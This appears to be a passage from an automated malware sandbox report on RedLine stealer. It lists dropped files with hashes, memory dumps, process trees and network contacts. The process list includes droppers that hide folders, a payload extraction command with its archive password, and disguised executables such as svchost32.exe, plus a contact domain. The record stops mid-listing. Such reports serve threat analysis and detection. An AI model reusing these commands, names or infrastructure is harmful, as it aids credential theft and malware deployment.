C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
| MD5 | 05a53f6adcf94e74f669c61414ae4510 |
| SHA1 | 75a81724db1e333f58cc2647c051b1a91c68f9bb |
| SHA256 | a3e961bf435fa024c8db02ee29458f5959eb1491287b101a8933f233c92508ba |
| SHA512 | 5fc95fa743327526e09f18946d93488b0d668fd47df67464d31466031c3f1a58c961609bffc4f1bdf055260ee39d1a4e9d4fc4a650cb41be9f50b6f75df66fe6 |
memory/1984-150-0x0000000000000000-mapping.dmp
memory/1712-149-0x0000000000000000-mapping.dmp
memory/1984-154-0x0000000002000000-0x0000000002001000-memory.dmp
memory/1984-156-0x000000001AB80000-0x000000001AB81000-memory.dmp
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 17ce740b7ab93ca82c8a76b7e66d23fc |
| SHA1 | d73f57938e16c47969dd6691a89116eba77319c8 |
| SHA256 | b6cd3fb316b67a82f052bb05deeafcdfcc8cce79cab8137246bedbaddefbd069 |
| SHA512 | 9445cfc6652c309d1ed151e2bea5ea9e36272a57ef7d6b511f51b3d505895e258ff855e2ff3b89575d06d4e4e05d444998a64a99484e895bb32133aeaeac8c42 |
memory/1984-159-0x0000000001F50000-0x0000000001F51000-memory.dmp
memory/1984-161-0x0000000001EB0000-0x0000000001EB1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_70d42ca4-5bd0-494a-b78d-0087dde1ab0e
| MD5 | 7f79b990cb5ed648f9e583fe35527aa7 |
| SHA1 | 71b177b48c8bd745ef02c2affad79ca222da7c33 |
| SHA256 | 080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683 |
| SHA512 | 20926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4edd174d-f3b2-4acd-b81e-cea39cd95964
| MD5 | e5b3ba61c3cf07deda462c9b27eb4166 |
| SHA1 | b324dad73048be6e27467315f82b7a5c1438a1f9 |
| SHA256 | b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925 |
| SHA512 | a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_631e3502-8821-44f6-b5ec-3c3c2617d403
| MD5 | 6f0d509e28be1af95ba237d4f43adab4 |
| SHA1 | c665febe79e435843553bee86a6cea731ce6c5e4 |
| SHA256 | f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e |
| SHA512 | 8dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ecd02380-bc43-4d8b-b403-176e364fc838
| MD5 | d89968acfbd0cd60b51df04860d99896 |
| SHA1 | b3c29916ccb81ce98f95bbf3aa8a73de16298b29 |
| SHA256 | 1020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9 |
| SHA512 | b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6803edb6-1c3c-4c4d-a892-ddb1d6d5788a
| MD5 | faa37917b36371249ac9fcf93317bf97 |
| SHA1 | a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4 |
| SHA256 | b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132 |
| SHA512 | 614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
| MD5 | 05a53f6adcf94e74f669c61414ae4510 |
| SHA1 | 75a81724db1e333f58cc2647c051b1a91c68f9bb |
| SHA256 | a3e961bf435fa024c8db02ee29458f5959eb1491287b101a8933f233c92508ba |
| SHA512 | 5fc95fa743327526e09f18946d93488b0d668fd47df67464d31466031c3f1a58c961609bffc4f1bdf055260ee39d1a4e9d4fc4a650cb41be9f50b6f75df66fe6 |
memory/1884-169-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 17ce740b7ab93ca82c8a76b7e66d23fc |
| SHA1 | d73f57938e16c47969dd6691a89116eba77319c8 |
| SHA256 | b6cd3fb316b67a82f052bb05deeafcdfcc8cce79cab8137246bedbaddefbd069 |
| SHA512 | 9445cfc6652c309d1ed151e2bea5ea9e36272a57ef7d6b511f51b3d505895e258ff855e2ff3b89575d06d4e4e05d444998a64a99484e895bb32133aeaeac8c42 |
memory/1520-174-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 17ce740b7ab93ca82c8a76b7e66d23fc |
| SHA1 | d73f57938e16c47969dd6691a89116eba77319c8 |
| SHA256 | b6cd3fb316b67a82f052bb05deeafcdfcc8cce79cab8137246bedbaddefbd069 |
| SHA512 | 9445cfc6652c309d1ed151e2bea5ea9e36272a57ef7d6b511f51b3d505895e258ff855e2ff3b89575d06d4e4e05d444998a64a99484e895bb32133aeaeac8c42 |
memory/940-183-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 17ce740b7ab93ca82c8a76b7e66d23fc |
| SHA1 | d73f57938e16c47969dd6691a89116eba77319c8 |
| SHA256 | b6cd3fb316b67a82f052bb05deeafcdfcc8cce79cab8137246bedbaddefbd069 |
| SHA512 | 9445cfc6652c309d1ed151e2bea5ea9e36272a57ef7d6b511f51b3d505895e258ff855e2ff3b89575d06d4e4e05d444998a64a99484e895bb32133aeaeac8c42 |
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/1228-188-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 17ce740b7ab93ca82c8a76b7e66d23fc |
| SHA1 | d73f57938e16c47969dd6691a89116eba77319c8 |
| SHA256 | b6cd3fb316b67a82f052bb05deeafcdfcc8cce79cab8137246bedbaddefbd069 |
| SHA512 | 9445cfc6652c309d1ed151e2bea5ea9e36272a57ef7d6b511f51b3d505895e258ff855e2ff3b89575d06d4e4e05d444998a64a99484e895bb32133aeaeac8c42 |
memory/2036-198-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\svchost32.exe
| MD5 | 603bb9cb905666cc9f5776d5ddccc0be |
| SHA1 | 4880ee993d1076095f1d22d1337f93584ceeea82 |
| SHA256 | 2999bf95a33e43e5e080cb07aaa7ca29c058a1b0d3668f17d33819cdf971c47b |
| SHA512 | 052441596e9f1b623f4812eac253963b72363aba7cc8c9da3795cd8dbc135e42b070c59ca584537d9e1754641543a116ee1ef0a9ea66060ec28ddf1545b2bff8 |
memory/1908-200-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\svchost32.exe
| MD5 | 603bb9cb905666cc9f5776d5ddccc0be |
| SHA1 | 4880ee993d1076095f1d22d1337f93584ceeea82 |
| SHA256 | 2999bf95a33e43e5e080cb07aaa7ca29c058a1b0d3668f17d33819cdf971c47b |
| SHA512 | 052441596e9f1b623f4812eac253963b72363aba7cc8c9da3795cd8dbc135e42b070c59ca584537d9e1754641543a116ee1ef0a9ea66060ec28ddf1545b2bff8 |
C:\Users\Admin\AppData\Local\Temp\svchost32.exe
| MD5 | 603bb9cb905666cc9f5776d5ddccc0be |
| SHA1 | 4880ee993d1076095f1d22d1337f93584ceeea82 |
| SHA256 | 2999bf95a33e43e5e080cb07aaa7ca29c058a1b0d3668f17d33819cdf971c47b |
| SHA512 | 052441596e9f1b623f4812eac253963b72363aba7cc8c9da3795cd8dbc135e42b070c59ca584537d9e1754641543a116ee1ef0a9ea66060ec28ddf1545b2bff8 |
memory/1932-205-0x0000000004C70000-0x0000000004C71000-memory.dmp
memory/1984-206-0x000000001AB00000-0x000000001AB02000-memory.dmp
memory/1984-207-0x000000001AB04000-0x000000001AB06000-memory.dmp
memory/1712-208-0x000000001AC60000-0x000000001AC62000-memory.dmp
memory/548-209-0x000000001ABB4000-0x000000001ABB6000-memory.dmp
memory/1712-210-0x000000001AC64000-0x000000001AC66000-memory.dmp
memory/1884-212-0x000000001AE24000-0x000000001AE26000-memory.dmp
memory/1884-211-0x000000001AE20000-0x000000001AE22000-memory.dmp
memory/1520-213-0x0000000002500000-0x0000000002502000-memory.dmp
memory/1520-214-0x0000000002504000-0x0000000002506000-memory.dmp
memory/940-215-0x000000001AD00000-0x000000001AD02000-memory.dmp
memory/940-216-0x000000001AD04000-0x000000001AD06000-memory.dmp
memory/1228-217-0x000000001AB20000-0x000000001AB22000-memory.dmp
memory/1228-218-0x000000001AB24000-0x000000001AB26000-memory.dmp
memory/1292-219-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\svchost64.exe
| MD5 | 462eab047978bb8b856ee7660a39877c |
| SHA1 | 4bd4d796e8404ce7a06795a9423b9e30b4d831ab |
| SHA256 | 12799e75db154a83b20b504e52d1b1f97ce40bef57ea6afac625796eb0acf29a |
| SHA512 | 0281647b9b6df2a4ab9032a667dd6349cd094c9dff6303e91af5e4868d2839399a4514673702fb71d21a266a642a40c26ab773f4e03c624c2a56ca6872e3de7e |
memory/1948-222-0x0000000000000000-mapping.dmp
memory/1784-221-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\svchost64.exe
| MD5 | 462eab047978bb8b856ee7660a39877c |
| SHA1 | 4bd4d796e8404ce7a06795a9423b9e30b4d831ab |
| SHA256 | 12799e75db154a83b20b504e52d1b1f97ce40bef57ea6afac625796eb0acf29a |
| SHA512 | 0281647b9b6df2a4ab9032a667dd6349cd094c9dff6303e91af5e4868d2839399a4514673702fb71d21a266a642a40c26ab773f4e03c624c2a56ca6872e3de7e |
C:\Users\Admin\AppData\Local\Temp\svchost64.exe
| MD5 | 462eab047978bb8b856ee7660a39877c |
| SHA1 | 4bd4d796e8404ce7a06795a9423b9e30b4d831ab |
| SHA256 | 12799e75db154a83b20b504e52d1b1f97ce40bef57ea6afac625796eb0acf29a |
| SHA512 | 0281647b9b6df2a4ab9032a667dd6349cd094c9dff6303e91af5e4868d2839399a4514673702fb71d21a266a642a40c26ab773f4e03c624c2a56ca6872e3de7e |
memory/1192-227-0x0000000000000000-mapping.dmp
memory/1676-228-0x0000000000000000-mapping.dmp
memory/1888-229-0x0000000000000000-mapping.dmp
memory/1908-230-0x000000001BDD0000-0x000000001BDD2000-memory.dmp
memory/1784-231-0x000000001BFD0000-0x000000001BFD2000-memory.dmp
\Windows\System32\services32.exe
| MD5 | bec0eae49234663c36f6247f68c79f6a |
| SHA1 | 7ca78913a61335b793c7bf0da11583562191d5ca |
| SHA256 | 5027171f6a2fe8de197451587a040afa75dc236f55ff80f0548e4ef3c04341bd |
| SHA512 | c7275a3763286878026cb56b85eb6c800c1a800d31ee3f0a1b2e1964dbf3df45e57cd750690540f92cbacc3991a5d2b8b2c64c75db5de5623dfd191d55f09699 |
memory/1328-233-0x0000000000000000-mapping.dmp
C:\Windows\System32\services32.exe
| MD5 | bec0eae49234663c36f6247f68c79f6a |
| SHA1 | 7ca78913a61335b793c7bf0da11583562191d5ca |
| SHA256 | 5027171f6a2fe8de197451587a040afa75dc236f55ff80f0548e4ef3c04341bd |
| SHA512 | c7275a3763286878026cb56b85eb6c800c1a800d31ee3f0a1b2e1964dbf3df45e57cd750690540f92cbacc3991a5d2b8b2c64c75db5de5623dfd191d55f09699 |
C:\Windows\system32\services32.exe
| MD5 | bec0eae49234663c36f6247f68c79f6a |
| SHA1 | 7ca78913a61335b793c7bf0da11583562191d5ca |
| SHA256 | 5027171f6a2fe8de197451587a040afa75dc236f55ff80f0548e4ef3c04341bd |
| SHA512 | c7275a3763286878026cb56b85eb6c800c1a800d31ee3f0a1b2e1964dbf3df45e57cd750690540f92cbacc3991a5d2b8b2c64c75db5de5623dfd191d55f09699 |
memory/1796-241-0x0000000000000000-mapping.dmp
C:\Windows\System32\services64.exe
| MD5 | 8ec76da7bfe6c529ef72663bfd51f7ca |
| SHA1 | 1ea53c3b298c710026e84bfb49d1c444d467b8d4 |
| SHA256 | 7529fba2b0f52fc3764fb8c873cbef625d186cc1f7d41e98461d4cb4f118dddb |
| SHA512 | ec2221b69aad1dbb1515422fa54ff021bb2dfec96b35fbad06b1e95f8a4e6bebbdbf7901ba9fd2c4c5b09e79d498a71a1f9e07b53b44fad8b51309586719bc45 |
memory/624-245-0x0000000000000000-mapping.dmp
memory/1548-244-0x0000000000000000-mapping.dmp
memory/2032-250-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 17ce740b7ab93ca82c8a76b7e66d23fc |
| SHA1 | d73f57938e16c47969dd6691a89116eba77319c8 |
| SHA256 | b6cd3fb316b67a82f052bb05deeafcdfcc8cce79cab8137246bedbaddefbd069 |
| SHA512 | 9445cfc6652c309d1ed151e2bea5ea9e36272a57ef7d6b511f51b3d505895e258ff855e2ff3b89575d06d4e4e05d444998a64a99484e895bb32133aeaeac8c42 |
memory/1984-249-0x0000000000000000-mapping.dmp
C:\Windows\system32\services64.exe
| MD5 | 8ec76da7bfe6c529ef72663bfd51f7ca |
| SHA1 | 1ea53c3b298c710026e84bfb49d1c444d467b8d4 |
| SHA256 | 7529fba2b0f52fc3764fb8c873cbef625d186cc1f7d41e98461d4cb4f118dddb |
| SHA512 | ec2221b69aad1dbb1515422fa54ff021bb2dfec96b35fbad06b1e95f8a4e6bebbdbf7901ba9fd2c4c5b09e79d498a71a1f9e07b53b44fad8b51309586719bc45 |
memory/1008-240-0x0000000000000000-mapping.dmp
\Windows\System32\services64.exe
| MD5 | 8ec76da7bfe6c529ef72663bfd51f7ca |
| SHA1 | 1ea53c3b298c710026e84bfb49d1c444d467b8d4 |
| SHA256 | 7529fba2b0f52fc3764fb8c873cbef625d186cc1f7d41e98461d4cb4f118dddb |
| SHA512 | ec2221b69aad1dbb1515422fa54ff021bb2dfec96b35fbad06b1e95f8a4e6bebbdbf7901ba9fd2c4c5b09e79d498a71a1f9e07b53b44fad8b51309586719bc45 |
memory/412-238-0x0000000000000000-mapping.dmp
memory/1060-254-0x0000000000000000-mapping.dmp
memory/744-255-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 36e58c4b0e189fe2cb2c59b3fcfff464 |
| SHA1 | f67e01ef8e667653865c30e4d6ce27036e028bfe |
| SHA256 | c017bf98cfb7f89d59373bf1d830e6b6ad1f29ad58f7533c88ac527cbec47ffe |
| SHA512 | 84034ff0e0d3a7af665a027a3c15a3bbb4425789d0683d83ef3ab8365bded63dc0da0a84a8f662f6f69c5c41e1e1042a07c802b65a30d74c9aba6bca85c5346e |
memory/1328-261-0x00000000022D0000-0x00000000022D2000-memory.dmp
memory/624-263-0x000000001A930000-0x000000001A932000-memory.dmp
memory/744-266-0x000000001AD80000-0x000000001AD82000-memory.dmp
memory/744-267-0x000000001AD84000-0x000000001AD86000-memory.dmp
memory/624-265-0x000000001A934000-0x000000001A936000-memory.dmp
memory/1008-262-0x00000000008C0000-0x00000000008C2000-memory.dmp
memory/1564-270-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 36e58c4b0e189fe2cb2c59b3fcfff464 |
| SHA1 | f67e01ef8e667653865c30e4d6ce27036e028bfe |
| SHA256 | c017bf98cfb7f89d59373bf1d830e6b6ad1f29ad58f7533c88ac527cbec47ffe |
| SHA512 | 84034ff0e0d3a7af665a027a3c15a3bbb4425789d0683d83ef3ab8365bded63dc0da0a84a8f662f6f69c5c41e1e1042a07c802b65a30d74c9aba6bca85c5346e |
memory/984-275-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 36e58c4b0e189fe2cb2c59b3fcfff464 |
| SHA1 | f67e01ef8e667653865c30e4d6ce27036e028bfe |
| SHA256 | c017bf98cfb7f89d59373bf1d830e6b6ad1f29ad58f7533c88ac527cbec47ffe |
| SHA512 | 84034ff0e0d3a7af665a027a3c15a3bbb4425789d0683d83ef3ab8365bded63dc0da0a84a8f662f6f69c5c41e1e1042a07c802b65a30d74c9aba6bca85c5346e |
memory/1564-282-0x000000001AA60000-0x000000001AA62000-memory.dmp
memory/984-284-0x0000000002640000-0x0000000002642000-memory.dmp
memory/1564-283-0x000000001AA64000-0x000000001AA66000-memory.dmp
memory/984-285-0x0000000002644000-0x0000000002646000-memory.dmp
memory/692-288-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 36e58c4b0e189fe2cb2c59b3fcfff464 |
| SHA1 | f67e01ef8e667653865c30e4d6ce27036e028bfe |
| SHA256 | c017bf98cfb7f89d59373bf1d830e6b6ad1f29ad58f7533c88ac527cbec47ffe |
| SHA512 | 84034ff0e0d3a7af665a027a3c15a3bbb4425789d0683d83ef3ab8365bded63dc0da0a84a8f662f6f69c5c41e1e1042a07c802b65a30d74c9aba6bca85c5346e |
memory/692-293-0x000000001A930000-0x000000001A932000-memory.dmp
memory/916-295-0x0000000000000000-mapping.dmp
memory/692-294-0x000000001A934000-0x000000001A936000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 36e58c4b0e189fe2cb2c59b3fcfff464 |
| SHA1 | f67e01ef8e667653865c30e4d6ce27036e028bfe |
| SHA256 | c017bf98cfb7f89d59373bf1d830e6b6ad1f29ad58f7533c88ac527cbec47ffe |
| SHA512 | 84034ff0e0d3a7af665a027a3c15a3bbb4425789d0683d83ef3ab8365bded63dc0da0a84a8f662f6f69c5c41e1e1042a07c802b65a30d74c9aba6bca85c5346e |
memory/916-303-0x000000001ACE0000-0x000000001ACE2000-memory.dmp
memory/916-304-0x000000001ACE4000-0x000000001ACE6000-memory.dmp
memory/1108-306-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 36e58c4b0e189fe2cb2c59b3fcfff464 |
| SHA1 | f67e01ef8e667653865c30e4d6ce27036e028bfe |
| SHA256 | c017bf98cfb7f89d59373bf1d830e6b6ad1f29ad58f7533c88ac527cbec47ffe |
| SHA512 | 84034ff0e0d3a7af665a027a3c15a3bbb4425789d0683d83ef3ab8365bded63dc0da0a84a8f662f6f69c5c41e1e1042a07c802b65a30d74c9aba6bca85c5346e |
memory/2040-311-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 36e58c4b0e189fe2cb2c59b3fcfff464 |
| SHA1 | f67e01ef8e667653865c30e4d6ce27036e028bfe |
| SHA256 | c017bf98cfb7f89d59373bf1d830e6b6ad1f29ad58f7533c88ac527cbec47ffe |
| SHA512 | 84034ff0e0d3a7af665a027a3c15a3bbb4425789d0683d83ef3ab8365bded63dc0da0a84a8f662f6f69c5c41e1e1042a07c802b65a30d74c9aba6bca85c5346e |
memory/2040-318-0x000000001AA44000-0x000000001AA46000-memory.dmp
memory/1108-319-0x000000001AC84000-0x000000001AC86000-memory.dmp
memory/2040-320-0x000000001AA40000-0x000000001AA42000-memory.dmp
memory/1108-316-0x000000001AC80000-0x000000001AC82000-memory.dmp
memory/1692-324-0x0000000000000000-mapping.dmp
memory/2000-325-0x0000000000000000-mapping.dmp
memory/1440-328-0x0000000000000000-mapping.dmp
memory/1768-330-0x0000000000000000-mapping.dmp
memory/1240-329-0x0000000000000000-mapping.dmp
memory/1012-331-0x0000000000000000-mapping.dmp
memory/1740-334-0x0000000000000000-mapping.dmp
memory/784-337-0x0000000000000000-mapping.dmp
memory/2000-338-0x000000001BD20000-0x000000001BD22000-memory.dmp
memory/1240-340-0x00000000022E0000-0x00000000022E2000-memory.dmp
memory/1072-339-0x0000000000000000-mapping.dmp
memory/1740-341-0x00000000024F0000-0x00000000024F2000-memory.dmp
memory/1924-342-0x0000000000000000-mapping.dmp
memory/1924-345-0x000000001BC40000-0x000000001BC42000-memory.dmp
memory/1524-346-0x0000000000000000-mapping.dmp
memory/1908-347-0x0000000000000000-mapping.dmp
memory/1940-349-0x00000001402F327C-mapping.dmp
memory/1076-350-0x0000000000000000-mapping.dmp
memory/1944-352-0x0000000000000000-mapping.dmp
memory/1940-353-0x0000000140000000-0x0000000140763000-memory.dmp
memory/1940-355-0x0000000000510000-0x0000000000530000-memory.dmp
memory/1940-354-0x00000000004F0000-0x0000000000510000-memory.dmp
Analysis: behavioral16
Detonation Overview
Submitted
2021-08-11 12:52
Reported
2021-08-11 12:55
Platform
win10v20210410
Max time kernel
30s
Max time network
132s
Command Line
Signatures
RedLine
RedLine Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\NSpack\updIns\Sgsmmodul.com | N/A |
| N/A | N/A | C:\NSpack\updIns\mmscx.exe | N/A |
| N/A | N/A | C:\NSpack\updIns\mmscx.exe | N/A |
Sets file to hidden
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1796 set thread context of 2572 | N/A | C:\NSpack\updIns\mmscx.exe | C:\NSpack\updIns\mmscx.exe |
Enumerates physical storage devices
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\file3.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\NSpack\updIns\mmscx.exe | N/A |
| N/A | N/A | C:\NSpack\updIns\mmscx.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\NSpack\updIns\mmscx.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\file3.exe
"C:\Users\Admin\AppData\Local\Temp\file3.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\NSpack\updIns\tetracom.vbs" /f=CREATE_NO_WINDOW install.cmd
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\NSpack\updIns\44t.bat" "
C:\Windows\SysWOW64\timeout.exe
timeout 7
C:\NSpack\updIns\Sgsmmodul.com
"Sgsmmodul.com" e -pEktfsdu78s8f87Ap8pHr6Mqaq9SQ mit.rar
C:\Windows\SysWOW64\timeout.exe
timeout 6
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\NSpack\updIns\sevenup.vbs"
C:\Windows\SysWOW64\timeout.exe
timeout 8
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\NSpack\updIns\gg4359.bat" "
C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\NSpack\updIns"
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\NSpack\updIns\mmscx.exe
mmscx.exe /start
C:\NSpack\updIns\mmscx.exe
mmscx.exe /start
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Sgsmmodul.com
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Sgsmmodul.com
C:\Windows\SysWOW64\attrib.exe
attrib -s -h "C:\NSpack\updIns"
C:\Windows\SysWOW64\timeout.exe
timeout 4
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | sandedean.xyz | udp |
| N/A | 212.224.105.82:80 | sandedean.xyz | tcp |
| N/A | 8.8.8.8:53 | api.ip.sb | udp |
| N/A | 104.26.13.31:443 | api.ip.sb | tcp |
Files
memory/2404-114-0x0000000000000000-mapping.dmp
C:\NSpack\updIns\tetracom.vbs
| MD5 | bdc0fb5cada9a89f074961224aaf4e63 |
| SHA1 | 9284fe4ecc0fde705fc596dd89191c02915fd7a4 |
| SHA256 | b6156e744da7ffcd5e47e78d487b2ad78b1babf44aaa4145d706247f308106db |
| SHA512 | 83cdf2cdc78106075fe5d8dfaa84fabae7251e76d8b706e74491291a03366bacd94ede79893e62f62f52c13c4cf1e5b5e53ebd49942d3789b01724464ee6ee28 |
C:\NSpack\updIns\44t.bat
| MD5 | 96c69dbc1233bfa7c5e883658e0758d4 |
| SHA1 | 613179fa74db9e71516bdb3a93341e9d90c4ecba |
| SHA256 | deb0fa40647bb04decbdf7e62fd62985bceb5a47ab5f15556763b8db1266acde |
| SHA512 | 43d0621374de43a216086807ac90f3dac4339975cfca251e762c84680bbe4932dfcfee9d08e5c2ff113fa2b4db50e4e8ede960864da34d8905e76851ed91e0d3 |
memory/2752-117-0x0000000000000000-mapping.dmp
memory/3916-118-0x0000000000000000-mapping.dmp
C:\NSpack\updIns\dc.isi
| MD5 | fbd467e1613c53b03376e987f3dbf2da |
| SHA1 | e2ca3ff625122f49e8a382dee32d0ca2f98648bf |
| SHA256 | cca183bc9bb6e35a4713e1e25e80147ff5ab3857984a22ce74b5836f6e98ab68 |
| SHA512 | e2cf3762d688a9d4b43224e86a258751085734af3da3bac93cc3baabb8499b2147c8026dcfc9745fedc5b906116cf1e59f010ad342b43ae242dbc47755fc0e05 |
memory/1540-120-0x0000000000000000-mapping.dmp
C:\NSpack\updIns\Sgsmmodul.com
| MD5 | 061f64173293969577916832be29b90d |
| SHA1 | b05b80385de20463a80b6c9c39bd1d53123aab9b |
| SHA256 | 34dfe4869b0a524c63cc4696fafe30c83a22dc5fe4b994b9fe777f2c986733ce |
| SHA512 | 66e284f7c7e40af988ab09ff48cc786d287ac906368042d98d313be764058f01ecb5c3a7ab8d4336ee6494ea4a1347e73f0f2b4f3baec25ca6bcec1d888bd3da |
memory/3328-122-0x0000000000000000-mapping.dmp
C:\NSpack\updIns\sevenup.vbs
| MD5 | 6a551928353982ab64107a4929c91c91 |
| SHA1 | b68ee5e77a722638f184d0fbf6a4834bb8cc188e |
